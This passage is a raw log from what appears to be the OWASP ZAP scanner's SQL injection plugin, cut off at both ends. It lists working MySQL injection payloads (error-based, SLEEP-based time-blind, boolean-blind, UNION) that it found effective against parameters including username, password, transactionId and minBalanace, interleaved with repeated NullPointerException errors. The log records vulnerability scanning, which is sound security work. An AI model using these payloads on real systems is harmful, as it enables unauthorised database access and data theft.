clause with payload [2010-01-01' AND (SELECT 5059 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5059=5059,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'mLca'='mLca] on parameter 'transactionDate' 9268609 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9278662 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))QwRL) AND 'IVXM'='IVXM] on parameter 'transactionDate' 9278663 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9278663 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))Txzl) AND 'RuCP'='RuCP] on parameter 'transactionDate' 9278664 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9278865 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01' #] on parameter 'transactionDate' 9278866 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9278867 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01' #] on parameter 'transactionDate' 9278868 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9279052 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (9264=9264) THEN 9264 ELSE 9264*(SELECT 9264 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'orderby' 9279053 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9279060 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 5020 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5020=5020,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'orderby' 9279061 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9279062 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (1818=1818) THEN 1818 ELSE 1818*(SELECT 1818 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgid' 9279063 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9279066 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 9516 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9516=9516,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgid' 9279067 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9289109 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))oQGD)] on parameter 'orderby' 9289110 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9289117 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))zbel)] on parameter 'msgid' 9289118 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9289439 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [10000 AND 3415=3415] on parameter 'minBalanace' 9289440 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9289443 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [10000 AND (SELECT 4104 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4104=4104,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'minBalanace' 9289444 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9289457 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (6151=6151) THEN 6151 ELSE 6151*(SELECT 6151 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgId' 9289458 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9289462 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 4992 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(4992=4992,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgId' 9289462 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9299500 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [10000 AND (SELECT * FROM (SELECT(SLEEP(5)))eIiW)] on parameter 'minBalanace' 9299501 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9299510 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))PgmT)] on parameter 'msgId' 9299511 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9299517 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9299526 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9299574 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9299581 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9299600 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9299608 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9299653 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'msgId' 9299654 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9299656 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9299661 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9299852 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [132 AND 1334=1334] on parameter 'transactionId' 9299853 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9299855 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [132 AND (SELECT 7515 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7515=7515,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'transactionId' 9299856 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9299872 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (6340=6340) THEN 6340 ELSE 6340*(SELECT 6340 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'orderby' 9299874 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9299876 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [msgid AND (SELECT 8816 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8816=8816,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'orderby' 9299877 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9309900 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [132 AND (SELECT * FROM (SELECT(SLEEP(5)))YOzf)] on parameter 'transactionId' 9309901 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9309911 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [msgid AND (SELECT * FROM (SELECT(SLEEP(5)))TUsz)] on parameter 'orderby' 9309915 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9309918 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9309923 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9309977 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9309981 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9310006 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9310010 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9310012 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [132 #] on parameter 'transactionId' 9310013 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9310817 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'msg' is not injectable 9310902 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [textvalue%' AND (SELECT 3367 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3367=3367,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='] on parameter 'msg' 9310903 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9320147 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [textvalue' AND (SELECT * FROM (SELECT(SLEEP(5)))scDn) AND 'Sikt'='Sikt] on parameter 'username' 9320148 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9320187 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9320192 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9320195 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9320200 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9320253 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9320258 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9320261 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9320269 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9320938 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [textvalue%' AND (SELECT * FROM (SELECT(SLEEP(5)))neJt) AND '%'='] on parameter 'msg' 9320939 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9320978 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9320982 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9321054 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9321058 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9321059 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [textvalue' #] on parameter 'msg' 9321060 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9321115 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (9404=9404) THEN 9404 ELSE 9404*(SELECT 9404 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgid' 9321116 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9321119 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 9775 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(9775=9775,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgid' 9321119 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9330576 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [textvalue' AND (SELECT * FROM (SELECT(SLEEP(5)))axzn) AND 'TGMg'='TGMg] on parameter 'username' 9330577 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9330622 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9330632 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9330639 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9330644 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9330699 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9330704 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9330705 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [textvalue' #] on parameter 'username' 9330706 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9331150 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))GOKG)] on parameter 'msgid' 9331151 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9331317 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [10000 AND 6688=6688] on parameter 'minBalanace' 9331318 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9331320 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [10000 AND (SELECT 5554 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5554=5554,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'minBalanace' 9331321 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9340801 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [textvalue2' AND (SELECT * FROM (SELECT(SLEEP(5)))iCCi) AND 'wIBv'='wIBv] on parameter 'password' 9340802 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9340840 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9340845 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9340851 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9340856 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9340908 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9340918 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9340919 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [textvalue2' #] on parameter 'password' 9340920 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9341125 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [1 AND 5212=5212] on parameter 'msgId' 9341126 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9341128 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause with payload [1 AND (SELECT 1436 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1436=1436,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'msgId' 9341129 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9341352 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [10000 AND (SELECT * FROM (SELECT(SLEEP(5)))UVjw)] on parameter 'minBalanace' 9341353 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9341368 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9341373 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9341402 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9341407 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9341421 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9341426 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9341455 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9341462 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9341525 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (3460=3460) THEN 3460 ELSE 3460*(SELECT 3460 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'transactionId' 9341526 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9341551 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [ERROR-BASED Injection Found] MySQL >= 5.0 error-based - Parameter replace with payload [(SELECT 8344 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(8344=8344,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] on parameter 'transactionId' 9341552 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9351158 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))dfTI)] on parameter 'msgId' 9351159 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9351175 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9351179 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9351212 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9351216 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9351233 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9351236 [ZAP-ActiveScanner-0] INFO 